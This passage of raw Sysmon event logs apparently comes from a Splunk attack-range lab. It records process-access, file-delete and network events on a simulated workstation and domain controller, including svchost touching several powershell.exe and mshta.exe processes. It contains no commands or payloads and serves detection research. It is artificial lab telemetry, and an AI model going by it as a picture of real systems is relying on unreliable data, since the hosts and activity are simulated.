Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081599Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:36.614{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081598Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:36.614{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081597Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:36.614{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081596Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:36.614{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081595Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:36.614{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081594Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:36.614{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081593Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:36.614{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081592Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:36.614{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081591Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:36.614{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081590Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:36.614{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B288-615A-4E01-00000000FD01}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081589Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:36.614{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B288-615A-4E01-00000000FD01}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081588Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:36.615{2FDD8D40-B288-615A-4E01-00000000FD01}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081587Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:36.567{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAE724DF4602916213768C16D121422C,SHA256=9EE54FD0B4A3B8D20759F9F167ED52F1B129FA2537239F33CD2BF4763B4CEBCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103690Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:36.023{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=593C5B9BCD55D90156C823D6A0BB64D8,SHA256=C875D3B5ADF235C01F4C3A1EF9452C5E665B3FFF3377ABF2A88CE0E5CA51B7A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081586Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:36.020{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BCBBB1DB0C8D2764C3027B8D0244BBA5,SHA256=59FA31BA899F6AC2B4AF852CBBC1E2E50BE4DCB2DEBCED06305685A0859E74D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081603Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:37.707{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5540938CE40C0FE5BB8E8ED4C53874BC,SHA256=46222A64C10A80DC10C61AC6203927493D00C4D670EFC01AD9916661022FE453,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103691Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:37.023{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D35178D3C2424B89B630BDB62A88134,SHA256=DC542A5F3AA1982E54DE97EAD088ECE5B2AF3A8D333C4CC82935111CF3A85C6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081602Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:37.692{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=76B5A4BF35A8BBD09DAD7C8E8E3470BF,SHA256=60653BC74323B2E1367E1CAD1A261637C2D486CC3538A2357650262DE5F1E413,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081604Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:38.926{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7FDAD1718DE0E4F14C589F53DBFBD0E,SHA256=127C29CF59C3D29462B82AA0DEA0B7F25B71B5264AA3478C2A1D7DCD8271FD8B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103693Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:36.352{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49536-false10.0.1.12-8000- 23542300x8000000000000000103692Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:38.023{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4736ECF97A882DBBF61A8311E23EFB07,SHA256=BECE9BCF680D840AB94AD8907A3E149B76AA51F0856ED2394D48A723B98DCF4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081605Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:39.942{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE00DC6561DD3E917225BEEBD93E0C22,SHA256=FFA76FD27DC55E8F1C06DD719C944BB11E65549806CC3764FF19A57444851044,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103694Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:39.038{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEC6F23903032DE5DDCEF68ACC8527A7,SHA256=160B4DE233ADEF65E7E67080B63E79FD7DFE661A50CEE49459A60E800CA44B43,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103707Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:40.773{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B124-615A-A401-00000000FC01}6036C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103706Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:40.773{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B124-615A-A301-00000000FC01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103705Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:40.773{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B124-615A-A401-00000000FC01}6036C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103704Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:40.773{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B124-615A-A301-00000000FC01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103703Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:40.773{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B123-615A-9F01-00000000FC01}5924C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103702Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:40.773{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B123-615A-A201-00000000FC01}6736C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103701Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:40.773{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B123-615A-A101-00000000FC01}3528C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103700Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:40.773{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B123-615A-A201-00000000FC01}6736C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103699Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:40.773{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B123-615A-A101-00000000FC01}3528C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103698Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:40.773{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B123-615A-9F01-00000000FC01}5924C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103697Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:40.773{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B123-615A-9E01-00000000FC01}6592C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103696Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:40.773{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B123-615A-9E01-00000000FC01}6592C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103695Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:40.085{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DF3D9B0E30A2B2BF0DF41B007A6CCF1,SHA256=FCAF0996E5475DA66B25BA4073B89DDD76249B004BF77FEA45F6FDF23F1D95CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081606Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 